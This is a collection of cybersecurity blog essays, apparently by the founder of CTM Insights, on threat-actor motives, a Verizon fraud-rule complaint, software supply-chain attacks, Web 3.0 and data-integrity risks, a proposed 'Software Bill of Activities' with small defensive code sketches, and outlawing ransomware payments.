It turns out that there are different types of threat actors, with differing motivations, that use different methods.  Understanding the “actor-motive-method” framework is key to smart risk management and governance; it allows one to focus investment on controls that align with likely attacks without over-investing in controls that are unlikely to be needed.  Imagine an attacker that wants to do harm to the pharmaceutical industry, and who developed a unique cyber-weapon.  If you are in pharma, you need to defend against it.  If you aren’t, there may be better places to invest resources.  “Actor-motive-method” lets you quickly determine whether a newsworthy attack method is material for you.

It’s worth exploring five types of actors, their motives, and some commonly used methods aligned with their goals.

Actor 1: Nation States

Most nation states engaged in hacking are motivated either by espionage or by preparation for cyberwar.  Espionage targets may have proprietary methods and know-how (industrial espionage) or may have valuable data related to national security or public figures.  If you are a defense contractor, healthcare provider, or part of critical infrastructure, you are a target of interest.  If you are a retailer, maybe not.  It’s valuable to view your business through a potential attacker’s lens to understand if compromising you matters to them.

Heavily sanctioned countries, such as Iran and North Korea, are also believed to execute attacks that steal money as a way to mitigate the impact on their economies.  This is far from common, but it’s important to focus specifically on the methods they employ if your company holds significant assets.  Additionally, Russia is believed to have executed disinformation campaigns in which media organizations are a target.

Because they don’t wish to be detected, many of the methods used by nation states are stealthy.  Exploiting “zero day” and unpublished vulnerabilities is common, as are targeted “spear phishing” campaigns and attacks through trusted third parties (vendors with privileged access, software supply chains, etc.).

Actor 2: Activists

In contrast with nation-states, activists generally want to draw attention to themselves and a cause.  Their goal is often to disrupt widely used systems and services to maximize impact.  They seek not just visibility, but want their damage or disruption to be attributed to them.  Anonymous is a commonly cited example, often focused on socio-political causes.

Specific actors may focus on a particular target or industry, particularly when they feel their cause has been wronged in some way.  Media organizations are often targets after unflattering publications.  Critical infrastructure is a common target because of the potential for widespread disruption.  It’s common for these actors to use methods like Denial of Service attacks, “wiper” software to delete data, and compromised login credentials.

Actor 3: Organized Crime

Most organized, criminal gangs are financially motivated; they want to steal money or monetary equivalents like cryptocurrency, extort payment, or steal data that can be readily sold.  These attackers are unconcerned about attribution to their organization so long as payment is received, as they often operate with impunity from places with a weak rule of law.  In some cases, they are protected by a government in exchange for only attacking geo-political rivals.

These actors tend to use less sophisticated methods than nation states, such as demanding payment to stop ransomware or Denial of Service attacks, and are less specific in their targeting.  Anyone with a high profile and perceived ability to pay is an extortion target.  Theft of data and account compromises often leverage social engineering, exploiting vulnerabilities, and phishing.

Actor 4: Employees & Partners

Most attacks from employees, contractors and partners are crimes of opportunity.  Theft is a significant motive for what’s called the “insider threat”, but vandalism and data destruction motivate those who have been recently dismissed or reprimanded.  The trusted access given to insiders can let them do significant harm, requiring controls like “least privilege” (limiting access to only what people need to do their job) and “maker-checker” (having an independent reviewer look at high risk things).

Most attacks by insiders are either meant to go undetected, or to be hard to attribute.  Administrative account compromise, intentional misuse of legitimate access, and destructive “time bombs” are common methods used.

Actor 5: Independent Individuals

Individual attackers have a variety of motivations.  Some seek financial gain, others simply want attention or prestige.  While a few have sophisticated skills, the vast majority are referred to as “script kiddies”, less-capable people running brute force attacks or using tools they acquired from others.

Many organizations have some level of exposure to these attackers, and their methods vary widely, but their lack of sophistication allows much of the threat to be mitigated by simple controls like firewalls, antivirus, patching, and good authentication (strong passwords or multi-factor authentication).

 

Most attacks are meant to (or quietly prepare to) damage infrastructure, steal money or IP, access customer information or other sensitive data, disrupt service, damage a reputation, or disseminate misinformation.  Variations and combinations of these exist, of course, and different actors have different methods and capabilities.  Once you know who is most likely to have an interest in attacking your business, and why, you can determine the current and evolving methods they might employ. 

Understanding actor-motive-method allows you to invest more in the right levels of controls against the right forms of attacks, in the right places.

Fraud vs customer (dis)satisfaction

As a former cybersecurity and fraud practitioner, I’m well aware of the trade-offs between a frictionless client experience and protecting those clients from fraud.  That’s why it’s unnerving to be confronted with unnecessary friction improperly blamed on “fraud prevention”.

I recently found this with Verizon Wireless.  Significant force (me), meet immovable object (them).  I’m sure they think they “won”.  They really just lost a customer.

I’ve had various Verizon wireless accounts for many years, including one for my mom’s cell service.  Verizon pushed “auto-pay”, in which they would either have unlimited access to withdraw money directly from my bank accounts (people really let them do that?)  or simply charge my credit card in advance for mom’s monthly bill.  All was fine until I noticed an old Verizon charge labeled “equipment”.  That seemed odd as we bought her unlocked phone elsewhere and brought it in.  I called Verizon customer service for help.

Enter the dreaded “try to talk to a human” problem.  The automated “IVR” that answered wasn’t going to let just anyone sit on hold; they needed me to prove my worth to get in the queue.  But their tech didn’t work.  It said the phone number I entered was not a Verizon wireless number and hung up.  Several attempts proved that simply re-entering a correct phone number wasn’t going to convince them otherwise.

I decided the best way to get their attention was to contest the charge until they explained what “equipment” we had bought.  Two things happened in rapid succession: the credit card company misunderstood and contested four Verizon charges, and 15 minutes later, with no help from the unreachable Verizon support, I deduced that the “equipment” was actually a mislabeled service fee.  Less than 20 minutes after contesting the charge(s) I called the credit card company and canceled all disputes.

At no time was Verizon paid late.  These were charges in the past and a prepaid account.

That didn’t matter.  Verizon has an algorithm that says multiple disputes must be “fraud” and, apparently, the fact that the disputes were all canceled immediately must somehow be more evidence of fraud.

Verizon responded by sending a text and email saying that my payment method on file wasn’t valid.  I assumed that Verizon wanted a different card.  Not so simple.  They hadn’t just decided that the uncontested charges for which they had already been paid were “fraud”.  No, they were “FRAUD!”  The result was that the account was put in “cash only” mode.  I finally got an agent, who assured me he would have it reviewed.  A day later, another set of messages arrived, repeating that we still had an invalid payment method.  Another long wait to chat with someone else, and I was told there is no way out.  Once in “cash only”, always in “cash only”.

“Can I give you a different credit card?”  Nope.  “OK, can we turn off auto-pay and you just bill me, since I already pay each month in advance of the service?”  Nope, cash only.  “Can I prepay for a year’s worth of service, in advance, and have a big credit?”  Nope.

“What CAN I do?”, I asked in frustration.  “You have always gotten paid in advance of the billing period.  There are no outstanding disputes.  I just want to minimize the inconvenience for my mom.”  Verizon said mom or I would have to go to a Verizon wireless store once a month, forever, and bring cash to pay for that month only.  Really? 

As if that wasn’t enough, they then offered another “solution”.  I could buy Verizon gift cards at WalMart and load them into my account each month.

Those who never worked alongside a fraud team might not realize the effect that the words “gift cards” have.  Scammers often ask people to provide gift cards as untraceable payment that can’t be reclaimed.  The suggestion that I purchase and provide gift cards in the name of fraud prevention made me check that my chat session hadn’t been hijacked.  It hadn’t.  Sigh.

So there it is.  In the name of FRAUD prevention, Verizon wanted me to walk into a store once a month forever and hand them a bag of bills with a dollar sign on it, or buy untraceable gift cards.  Somehow that prevents FRAUD more than my just giving them a year’s worth of money in advance.  All because we had a set of charges that were long since paid and nobody was contesting.

There was another solution, of course, involving a store visit.  This only took a single trip.  That store had a sign which read T-Mobile.  They happily ported the phone number over, gave my mom a discount, and took a credit card.  Apparently, over 35,000 other Verizon wireless customers also “voted with their feet” and left last quarter.  T-Mobile is expected to report a gain in subscribers.

I’m all for protecting accounts, but when arbitrary rules declare FRAUD on charges that are fully prepaid and uncontested, that’s a mistake.  The mistake is compounded when there aren’t adults who can intervene in clearly erroneous decisions.  It’s compounded further when the solution to their error is to inconvenience their customer by demanding a monthly cash payment in person.  It becomes patently absurd to say that gift cards are a solution to prevent fraud.  I don’t know any fraud professional who has ever recommended gift cards as a solution to any problem.  This was a bad business decision, blamed on fraud rules.

Poorly designed rules increase friction to the point that long-time customers become your competitor’s loyal customers.  Blaming poor processes on fraud policies is also why security teams get a bad rap.  All in the name of preventing a FRAUD risk that doesn’t exist.

How to make software supply chains resilient to cyber attacks

This article first appeared in VentureBeat

Imagine if someone asked you to drink a glass of liquid without telling you what was inside or what the ingredients might do. Would you drink it? Maybe, if it was given to you by someone you trusted, but what if that person said they couldn’t be sure what was inside? You probably wouldn’t partake.

Consuming the unknown is exactly what IT departments do every day. They install software and updates on critical systems without knowing what’s inside or what it does. They trust their suppliers, but the thing that software suppliers don’t tell IT departments is they can’t be sure of all their upstream suppliers. Protecting all of the parts of a software supply chain, including those outside of IT’s control, is nearly impossible. Unfortunately, bad actors are taking full advantage of this large “attack surface” and scoring big wins in cyber breaches.

A big problem getting bigger

The most famous example was the hack of Austin, Texas-based business software developer SolarWinds in 2020. Attackers inserted malicious code into software that was widely used by industry and the federal government. IT departments installed an update containing the malware and large volumes of sensitive and classified data were stolen.

Other software supply chain attacks have happened at companies like Kaseya, an IT Management software company where hackers added code to install ransomware, and Codecov, a tool provider whose software was used to steal data. And compromised versions of “coa” and “rc” open-source packages have been used to steal passwords. These names may not be familiar outside of IT, but they have large user bases to exploit. Coa and rc have tens of millions of downloads.

Quite obviously, attackers have figured out it’s far easier to hack software that people willingly install on thousands of systems than to hack each system individually. Software supply chain attacks increased by 300% from 2020 to 2021, according to an Argon Security report. This problem isn’t going away.

How could this happen?

There are two ways hackers attack software supply chains: they compromise software build tools or they compromise third-party components.

A lot of focus has been placed on securing the source code repositories of build tools. Google’s proposed SLSA (Supply Chain Levels for Software Artifacts) framework allows organizations to benchmark how well they have “locked down” these systems. That’s important because there are now hundreds of commonly used build tools — many of which are easily accessible in the cloud. Just this month, the open-source plugin Argo CD was found to have a significant vulnerability, allowing access to the secrets that unlock build and release systems. Argo CD is used by thousands of organizations and has been downloaded over half a million times.

At SolarWinds, attackers were able to access where source code was stored, and they added extra code that was ultimately used to steal data from SolarWinds users. SolarWinds built its software without realizing that malware was being included. This was like giving an untrusted person access to the ingredients in that glass of liquid.

Even if companies control their own build environments, the use of third-party components creates massive blind spots in software. Gone are the days when companies wrote a complete software package from scratch. Modern software is assembled from components built by others. Some of those third parties use components from fourth and fifth parties. All it takes is for one sub-sub-subcomponent to include malware and the final package now includes that malware. 

Examples of compromised components are staggeringly common, especially in the open-source world. “Namespace confusion attacks” are cases where someone uploads a package and simply claims it to be a newer version of something legitimate. Alternatively, hackers submit malicious code to be added to legitimate packages, since open source allows anyone to contribute updates. When a developer adds a compromised component to their code, they inherit all current and future vulnerabilities.
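One basic defense against the substitution problem specifically (a sketch; lockfiles and tools like pip's --require-hashes mode do this more completely, and the package name and hash below are placeholders) is to verify that a downloaded component matches the checksum recorded when it was first vetted, before it ever enters a build:

```python
import hashlib
import sys

# The hash recorded when this exact version of the component was reviewed.
# (Placeholder value, not a real package hash.)
EXPECTED_SHA256 = "0123456789abcdef..."

def verify(path: str, expected: str) -> bool:
    """Return True only if the downloaded artifact matches the pinned hash."""
    with open(path, "rb") as f:
        digest = hashlib.sha256(f.read()).hexdigest()
    return digest == expected

if not verify("vendor/some-package-1.2.3.tar.gz", EXPECTED_SHA256):
    sys.exit("component hash mismatch: possible tampering or namespace confusion")
```

Pinning catches swapped or tampered artifacts, but it does nothing about malicious code that was already present when the component was first adopted, which is why the rest of this article argues for something stronger.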

The solution: A permissions framework

Industry groups and government agencies like the Commerce Department’s National Telecommunications and Information Administration (NTIA) are working on developing a standard and plan to use an executive order to mandate the use of a software bill of materials (SBoM) for government-purchased software. An SBoM is a software ingredients list that helps identify what all of the components are, but unfortunately it won’t indicate whether they were hacked or will misbehave. Hackers won’t list their code in the ingredients.

Developers can improve the security of the build tools they control and list third-party ingredients from their suppliers, but that won’t be enough for them or their users to be sure that none of the ingredients were compromised. IT needs more than an ingredients list. It needs software developers to describe how code and components are expected to behave. IT teams can check those declarations and ensure they are consistent with the software’s purpose. If a program is supposed to be a calculator, for example, it shouldn’t include a behavior that says it will send data to China. Calculators don’t need to do that.

Of course, the compromised calculator might not say that it intends to send data overseas because hackers won’t publicize that software was compromised. A second step is necessary. When the software runs, it should be blocked from doing things it didn’t declare. If the software didn’t say it intended to send data to a foreign country, it wouldn’t be allowed to.
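A toy sketch of the runtime half of that idea (illustration only, with a hypothetical manifest; the real frameworks being developed are far richer): read the software's declared behaviors and refuse network connections it never declared.

```python
import socket

# Hypothetical manifest shipped with the software, declaring what it intends to do.
MANIFEST = {
    "name": "calculator",
    "declares_network": False,   # a calculator has no business phoning home
    "allowed_hosts": [],
}

_original_connect = socket.socket.connect

def guarded_connect(self, address):
    """Block any outbound connection the manifest did not declare."""
    host = address[0]
    if not MANIFEST["declares_network"] or host not in MANIFEST["allowed_hosts"]:
        raise PermissionError(f"undeclared network access to {host} blocked")
    return _original_connect(self, address)

# Enforce the declaration at runtime: any component that tries to send data
# out now raises PermissionError instead of silently exfiltrating.
socket.socket.connect = guarded_connect
```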

That sounds complicated, but examples already exist with mobile phone apps. When installed, apps ask for permission to access your camera, contacts, or microphone. Any unrequested access is blocked. We need a framework to apply the concept of mobile app-like permissions to data center software. And that’s what companies like mine and many others in our industry are working on. Here are two of the challenges.

One, if a human approves “sending data outside of my company,” do they mean all data? To anywhere? Listing all types of data and all destinations is too much detail to review, so this becomes a linguistic and taxonomy challenge as much as a technical one. How do we describe risky behaviors in a high-level way that makes sense to a human without losing important distinctions or the specific details that a computer needs?

Two, developers won’t use tools that slow them down. That’s a fact. Accordingly, much of the work in declaring how software is expected to behave can — and should — be automated. That means scanning code to discover the behaviors it contains to present findings to developers for review. Then, of course, the next challenge for everyone involved is to determine how accurate that scanning and assessment is.

These challenges are not insurmountable. It’s in everyone’s best interests to develop a permissions framework for data center software. Only then will we know it’s safe to take that drink.

Cybersecurity Risks of Web 3.0

(an edited version of this post first appeared in Security Magazine)

A new web for the Internet brings great promise and great risks, but we can't manage those risks until we define what it is.

What is Web 3.0?

You can't secure something if you can't describe it. The original "web 1.0" was a place to serve static pages built by companies.  Along came forums and social media, and we suddenly had a "web 2.0" in which users created and added content.  Tim Berners-Lee (inventor of web 1.0) coined the term web 3.0 to mean a web based on data that machines could process, not just people. If web 1.0 created an encyclopedia, web 2.0 was Wikipedia, and web 3.0 would make everything on the web into a massive database.

How would it get used?  In a word, AI. 

Why a machine readable web matters

AI eats data, and the promise of web 3.0 was to make all of the web into consumable data. That would provide a massive AI training set, most of which is currently inaccessible "unstructured data". The result could be a step function in AI capability. Imagine a Google, Siri, or Alexa search that was able to use all of it.  Today, if you ask Alexa a question, it might respond with "According to Wikipedia..." and read a web 2.0 article.  In the future, it could understand the meaning of everything online and provide a detailed answer.

Broadening web 3.0

People noticed that the trend was to "decentralize" the web. Web 1.0 served up content controlled by companies, and web 2.0 offers platforms controlled by companies hosting user-created content (e.g. Facebook). Why shouldn't web 3.0 provide a new platform for content to be added without a company controlling it? Simultaneously, blockchain emerged as a way in which anyone could post a transaction that would be validated and accepted by the consensus of a community instead of a platform owner. Those uncomfortable with the control of web 2.0 platform owners over content suddenly envisioned user content on distributed and decentralized platforms.

Is that a redefinition of Web 3.0?  Not entirely.  What Tim Berners-Lee described was a web with inherent meaning, which focuses on how data can be consumed. The new definition of a decentralized web focuses on how data gets added. There is no conceptual reason why both can't be right at the same time. I propose that web 3.0 is a platform in which anyone can add content without the control of centralized gatekeepers, AND the content has meaning which can be interpreted by people and machines.

Cyber risks

While the vision sounds amazing, with details to follow, there are concerns. Cyber security practitioners should be nervous about a poorly defined web 3.0 for a number of reasons.

  1. Quality: Web 1.0 relied on the reputation of publishers to be accurate. Web 2.0 lowered data quality, and a lot of online information is just plain wrong (look at all the incorrect posts about Covid or elections). Will the consensus to accept data in web 3.0 include accuracy checks? Who gets to make the decision, what are their qualifications, and what motivates them to be fact-based instead of promoting an agenda?

  2. Manipulation: Intentional manipulation of data that will be used for training AI is a huge concern. People can create bad data to manufacture the results they want, making AI the world's biggest disinformation system. When Microsoft decided to train their chatbot "Tay" by letting it learn from Twitter, people intentionally sent malicious tweets that trained it to be racist. Imagine what a nation state could do to disrupt things by feeding misinformation data or by changing the meaning of words. How will we find, block, and remove data that is designed to deceive?

  3. Availability: If our systems depend on data, what happens when that data is unavailable? The web today is full of broken links. Machines will either need to make local copies of everything on the Internet or go and fetch stuff on demand (web 2.0 is on demand). This could increase our dependency on the availability of systems we have no control over.

  4. Confidentiality: There is a lot of content online that was accidentally released, often sensitive data stored in publicly accessible folders. In most cases, nobody notices. With machines scanning and including that data in their knowledge base, we suddenly increase the likelihood of private data not just being found, but actually being used. Do we need new ways to prevent accidental release and misuse?


Those are just a few of the issues; more will likely arise as web 3.0 takes shape. Still, it makes sense to consider solutions to privacy and security from the start. 

The future of the web without gatekeepers, holding content meaningful to people and AI, sounds like a dream come true. We need to design in security to keep that dream from becoming a nightmare.

How Hackers will use "Killer Data"

Attacks against data integrity will be the next frontier in cyber warfare, and we need to be ready.

A radiologist “reads” CT scans, looking for signs of cancer. She carefully notes her findings on the unlucky images and is heartened when she writes “Normal” on the rest. The images are clear, and she makes no mistakes. Unfortunately, many of her conclusions are wrong because the images have been hacked and changed.

This hypothetical scenario is completely plausible. In 2019, a group of security researchers in Israel proved that they could use artificial intelligence to add or hide cancer in such images, with a greater than 95% success rate in getting radiologists to misdiagnose the disease. They also demonstrated that they could gain access to a hospital’s network and plant a small computer that performed the task. It’s within the reach of hackers to change medical data in ways that make people believe they have a disease they don’t, or keep them from being treated for a disease they do have.

Who would do such a thing, and why? To understand, we need to first look at how the motivations of hackers have evolved. Protecting data used to mean preventing unauthorized disclosure, primarily to prevent identity theft. Hackers can file false insurance claims or fake tax refunds if they know enough about you. They can charge items to your credit or debit cards, open new lines of credit in your name, or take over existing bank and other accounts.

A more recent motivation is to extract ransom in exchange for restoring access to information. Ransomware and network denial of service attacks make computers and data inaccessible, followed by demands for payment, and such attacks have skyrocketed in recent years.

That covers attacks against data confidentiality and availability. Why change data? Because we trust it to be accurate, so there’s value in exploiting that trust. Imagine a new form of ransom in which a hacker demands payment to tell a hospital which scans were changed. If the hospital doesn’t pay, patients would be misdiagnosed and mistreated.

In another scenario, imagine that a foreign state wants to influence an election: make a candidate think they have cancer or another disease and they might drop out, or hide the fact that a leader has an illness so they don’t seek treatment. Attackers can assassinate someone by creating “killer data” in their medical records. At a large scale, manipulating the results of clinical trials could cause drugs to be released that shouldn’t be, or prevent a company from releasing a valuable drug. 

The risks of changed data extend far beyond medicine. When hacktivists compromise web sites, they change the site to add messages that promote their cause. That’s a simple form of changing data. People with agendas post edited images as “fake news” on social media, which can lead to riots. In 2020, someone changed the voter registration information for the governor of Florida, temporarily preventing him from casting his ballot. Fake data can have real consequences.

If the data that are changed represent physical things, the impact can be devastating. Earlier this year, a hacker gained control of a city computer system in Florida and changed values to add toxic levels of chemicals into the water supply. Similar hacks have been made at water treatment plants in places like Israel. Killer data can be a weapon of mass destruction.

Attacks against data integrity will be the next frontier in cyber warfare. Large-scale attacks are coming and we need to be ready.

How do we stop this? Defending against data integrity attacks will require doing things we’ve never had to do before. We can try to prevent attackers from getting into our systems, but we need to add new ways to assess the trustworthiness of the data when they do get in. Attacks against trust can only be stopped by tools that reestablish trust, so that’s where we need to focus. We have some ideas, and need to develop more, before killer data becomes as commonplace as identity theft and ransomware.

Lou Steinberg is founder and managing partner of CTM Insights, a cybersecurity research lab and incubator

This article first appeared in Investment News.

A Better Approach to Securing Software Supply Chains


One fast-growing form of cyber attack is to embed malware into trusted software, allowing it to be installed without the knowledge of a user. This malware can be:

  • introduced directly into the software delivered by a trusted provider,

  • introduced into third-party provided libraries,

  • embedded in compromised APIs and services,

  • added to open source projects,

  • or injected into source code management tools and repositories, compilers, and packaging system tools. 

The attack surface is massive and dynamic, and in each instance the end result is the same: a software application or update is directly or indirectly changed without the knowledge and consent of the trusted provider or the user.

Your Software Supply Chain isn’t a Chain

Attempts to identify and assess every embedded component in a software package generally fail.  We can periodically survey software providers to see if their policies, procedures and practices meet minimum expectations, but that tells us little about specific software packages and even less about the components they source from others. 

Worse, a package may use multiple third-party components, each of which may have multiple embedded components.  While commonly referred to as a “software supply chain”, it’s more like a pyramid; the deeper you go, the more suppliers there are and the less visibility you have. 

 


Imagine your software vendor licenses a library from another company, that library makes a service call to a third company, and that service contains open source code.  What visibility would you have into the quality of the open source code?   Would you even know it exists?  Your ability to trust components decreases exponentially with distance (supplier layers).

No Good Baseline

It’s clear that we can’t evaluate the security of each component, especially when we don’t even know what all of the components are.  We can assess the finished software package, which is a smaller surface area that doesn’t require being able to pre-identify every part.  However, that assessment presumes we know what to look for. 

Static scans rely on things such as signatures, so new or custom malware could easily be missed.  We can do behavioral “dynamic analysis,” but the behavior baselines are generally built from past behaviors.  New software has no history, and updates are generally expected to have new features (meaning new behaviors).  In short, we don’t have a good baseline to compare against.

A new approach is clearly needed.

Declared Intent

That new approach is “Declared Intent.”  The premise is to evolve and apply the whitelist permission concept used by mobile apps.  When you install a mobile app, it asks for permission to access resources such as your camera, microphone, files, or network.  You can review the resources and decide if they make sense for the app you are installing.  You can also deny access.  

We need something like that in data center (and desktop) apps, only better.  We need to whitelist more than resources; we need to whitelist risky behaviors with resources.

Imagine if every provider of software components included a file that declared the intended behavior of their code.  Want to send data to a server in a foreign country?  Declare it.  Want to kill running processes that your software didn’t create?  Declare it.  Want to read files owned by another user?  Declare it. 

The declarations from each component could be combined and added to the declarations from the developer who created the finished package.  Unlike mobile apps, we wouldn’t just declare access to resources, we would declare actions.  With resources such as files, the risky behavior might be reading or writing files not owned by this userid and not in a publicly accessible directory (in Linux systems, this could include breaking out of a namespace).  A security team could review all declarations and decide if the behaviors are warranted before installing the software or update. 

We need to start by defining a behavioral framework and classification system for declarations.  One good approach is to inspect “system calls,” since most risky behaviors require acting through the operating system.  Of the roughly 400 Linux system calls, there are about 20 actions that are likely to be of interest to a security team.  We can layer on “variables” that further describe the specific resource. If a risky behavior is reading a file not owned by this program’s userid, the “variable” might be the filename or path of the file being read.
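As a sketch of what that classification might look like, the snippet below groups a few raw Linux system calls into reviewable actions and pairs one with a "variable."  The grouping is illustrative only, not a complete or authoritative taxonomy.

    # Illustrative grouping of Linux system calls into high-level risky actions.
    # The mapping is a sketch, not a complete taxonomy.
    RISKY_ACTIONS = {
        "network_connect": {"connect"},
        "spawn_process":   {"execve", "fork", "clone"},
        "kill_process":    {"kill", "tgkill"},
        "file_write":      {"write", "openat", "rename", "unlink"},
        "change_identity": {"setuid", "setgid"},
    }

    def classify(syscall):
        """Map a raw system call name to a reviewable risky action, if any."""
        for action, calls in RISKY_ACTIONS.items():
            if syscall in calls:
                return action
        return None

    # A declaration pairs the action with a "variable" describing the resource:
    declaration = {"action": "file_write", "variable": "/var/log/myapp/"}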

  • Step 1: Static Analysis.  Most software providers would bristle at the notion of having to manually classify the behaviors of their code; it runs counter to investments in developer productivity.  Automation through static analysis can help.  If we know what behaviors to look for, we can scan source code at check-in or build to automatically produce declarations.  Ideally, these declarations would be reviewed and tweaked by a developer who has a deep understanding of his/her intent and the “variables” described above.

When presented with a compiled binary component that lacks behavior declarations, we can scan the binary and detect system calls in assembly language.  This method is guaranteed to catch every system call, but is less precise at capturing intent.

For “variables” that aren’t defined in the software, such as those in user-created config files, we can supplement the declarations by asking the user to whitelist certain addresses and file paths.
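As a rough illustration of the automation in Step 1, the sketch below walks a Python syntax tree and drafts declarations for two hard-coded call patterns.  A real scanner would be language-specific and far more thorough; the call names and output format here are assumptions made for illustration.

    # Minimal sketch of drafting behavior declarations via static analysis.
    # Only two illustrative call patterns are recognized; real tooling would
    # cover far more, across languages and build steps.
    import ast

    RISKY_CALLS = {
        "subprocess.run": "spawn_process",
        "socket.connect": "network_connect",
    }

    def draft_declarations(source):
        behaviors = []
        for node in ast.walk(ast.parse(source)):
            if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
                name = f"{getattr(node.func.value, 'id', '?')}.{node.func.attr}"
                if name in RISKY_CALLS:
                    behaviors.append(RISKY_CALLS[name])
        return behaviors

    print(draft_declarations("import subprocess\nsubprocess.run(['ls'])"))
    # -> ['spawn_process']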

  • Step 2: From SBoM to SBoA.  Once behaviors are defined, they need to be stored and shared in a well understood format.  Fortunately, people have already been thinking about ways to describe applications and their components through a Software Bill of Materials (SBoM). 

Most SBoM work has focused on capturing the versions of components for license compliance checks and vulnerability tracking, but why stop there?  We propose extending one or more SBoMs to include the intended behaviors of each component in the package, in effect creating a Software Bill of Activities (SBoA). Leveraging and extending a standard SBoM schema makes the behavior declarations easier to consume and understand by both humans and tools.  It also increases the value of an SBoM by adding new use cases.

Leveraging an SBoM means we get the benefit of all of the work that’s gone into deciding how SBoMs should be stored, published, secured, and maintained.  SBoAs have these same needs.
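For illustration, an SBoA entry might look something like the sketch below: the familiar SBoM-style fields for a component, plus its declared behaviors.  The field names are hypothetical and not taken from any published SBoM schema.

    # Hypothetical SBoA entry: standard SBoM-style component data extended with
    # declared behaviors. Field names are illustrative, not a published schema.
    sboa_component = {
        "name": "fast-json-parser",
        "version": "2.3.1",
        "supplier": "example.org",
        "declared_behaviors": [
            {"action": "read_file",  "variable": "/etc/fastjson.conf"},
            {"action": "file_write", "variable": "/var/log/fastjson/"},
        ],
    }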

  • Step 3: Catching Gaps.  In an ideal world, every risky behavior in every software package would be pre-declared, stored in an SBoA, and risk-assessed by users.  Security professionals don’t believe in ideal worlds.  Motivated attackers will seek to obfuscate injected code, add code after the declarations are captured, or manipulate the SBoA.  Not all software suppliers will include an SBoA, and some may include versions that are out of date.  As a result, we will be left with gaps in declarations.

Systems designers would describe those gaps as the result of having an “open loop system,” relying on the SBoA to be accurate as it gets created and updated.  A “closed loop system” would ensure that the final SBoA is correct through a feedback loop. 

How?  By using the SBoA, which describes intended software behavior, to detect undeclared behaviors.  SBoAs are deterministic representations of intent, not best guesses based on previously observed behavior, making them the perfect baseline for runtime, dynamic analysis.

An SBoA could be ingested by a container or VM, loaded by an application firewall, or even translated into operating system “system call filters.”  As an application runs, violations could be blocked or generate alerts.  If a risky behavior isn’t declared, through simple omission or because of a malicious hack, it will be detected.
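As a hedged sketch of that last idea, the snippet below turns a list of declared actions into something shaped like a container-runtime seccomp profile, where anything undeclared is denied by default.  The action-to-syscall mapping is illustrative, and the exact profile schema should be checked against your runtime's documentation.

    # Sketch: translate SBoA declarations into a deny-by-default syscall allowlist,
    # roughly in the shape of a container-runtime seccomp profile. Mappings and
    # schema details are illustrative assumptions.
    import json

    ACTION_TO_SYSCALLS = {
        "network_connect": ["connect"],
        "file_write": ["write", "openat", "rename", "unlink"],
    }

    def sboa_to_profile(declared_actions):
        allowed = ["read", "close", "exit_group"]       # minimal baseline every program needs
        for action in declared_actions:
            allowed += ACTION_TO_SYSCALLS.get(action, [])
        return json.dumps({
            "defaultAction": "SCMP_ACT_ERRNO",          # block anything undeclared
            "syscalls": [{"names": sorted(set(allowed)), "action": "SCMP_ACT_ALLOW"}],
        }, indent=2)

    print(sboa_to_profile(["file_write"]))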

This three-step process of capturing intended behaviors, publishing them in a standard format for review, and runtime assessing for undeclared behaviors creates a trustworthy system.


More than the Sum of the Parts

The real value of this approach in securing software supply pyramids is more than the sum of the parts.  Static scans to declare behaviors, reviews of expected behaviors in an SBoA, and runtime enforcement of behaviors each have stand-alone merit. 

Value in the intersection

The intersection of all three creates a much more secure application.  Risky behaviors are declared, reviewed, and enforced without obvious opportunities for attackers to circumvent the system. 

 

Lou Steinberg is Founder & Managing Partner of CTM Insights, a cybersecurity research lab and early stage incubator.  CTM is researching the best ways to implement behavior whitelisting using Declared Intent.  We invite those interested to join us.

 

Making ransomware payments illegal

Last week, the US Department of Homeland Security announced a new public-private partnership called the Joint Cyber Defense Collaborative (JCDC).  The JCDC will align government with (mostly tech) company efforts to address key cybersecurity issues, the first of which is ransomware.  

While the JCDC sounds like a great idea, it isn’t needed in this case.  The government could easily stop most ransomware.

This administration gets high marks for recruiting talented cybersecurity leaders.  Chris Inglis is the White House’s National Cyber Director and Jen Easterly is the Director of the Cybersecurity and Infrastructure Security Agency (CISA).  Both are highly capable, but their talents are better focused elsewhere.

Ransomware is an economic attack that uses technical means.  Treating it as a technical problem misses the point.  There are technical controls that can help, of course, such as timely patching and frequent backups.  Technical controls are just point-in-time solutions; as better defenses are deployed, attackers evolve.  For example, when defenders improved backups, attackers evolved their methods by threatening to leak their victims’ sensitive data.  This is called “co-evolution”; both attackers and defenders ratchet up their capabilities over time.

While attackers’ methods may evolve, their motives remain unchanged.  In the case of ransomware, we are almost always talking about financial extortion.  Anonymous payments via cryptocurrencies, such as Bitcoin, have emboldened attackers by making it harder to follow the money. But neither the absence of controls nor the payment schemes are the best place to fundamentally disrupt this system. 

To really impact ransomware, we need to address the motivation behind it.  If the government made it illegal to pay ransom with impactful penalties (e.g. making corporate officers personally liable), the attackers would have little interest in continuing.  No public company with audited books would pay.  No municipality, public hospital, public school, or nonprofit would pay.  Nobody with audited financials would pay and risk going to jail.  At that point, there would be no reason for attackers to do the work and demand payment—they can’t get paid.

There might be some individuals and small private companies who pay and assume they won’t be caught.  Still, by making payments illegal we force the attackers to scale down to a less profitable segment of people without scrutinized books.  We shrink the value of attacking.

A version of this law already exists.  It’s illegal today to make a ransomware payment to an individual or country subject to Office of Foreign Assets Control (OFAC) sanctions.  Practically speaking, this is hard to enforce because the anonymity of cryptocurrency payments hides their destination.  We could either expand the regulation by requiring payers of ransomware to explicitly confirm that they aren’t violating sanctions, or simply outlaw all ransomware payments.

Some may argue that this is penalizing victims.  I disagree.  Until such a law takes effect, the victims are allowed to pay increasingly large ransoms.  Once the law takes effect, payments would stop.

Most laws exist to protect society from potentially harmful action of others.  Those who pay ransom today encourage attackers to continue attacking others.  Incenting someone to attack more victims creates harm to others.  We’ve seen this play out as both the frequency of attacks and the size of payments demanded have grown exponentially.

There is absolutely a role for government to play in stopping ransomware, and it’s simple.  Legislate.  Outlawing ransomware payments would remove the incentive to attack.  

 

Lou Steinberg is Founder & Managing Partner of CTM Insights, a cybersecurity research lab and early stage incubator

What you can do about ransomware

When non-technical people ask what I do, I usually say “I run a cybersecurity research lab and incubator.  Over the last 4 years we’ve solved hard problems like adding trust to the Internet, giving consumers control over what happens with their data and accounts, making cloud data worthless if stolen, stopping ransomware in its tracks, and detecting fake pictures online.  Now we’re working on things like protecting databases from being changed and protecting software from embedded malware”.

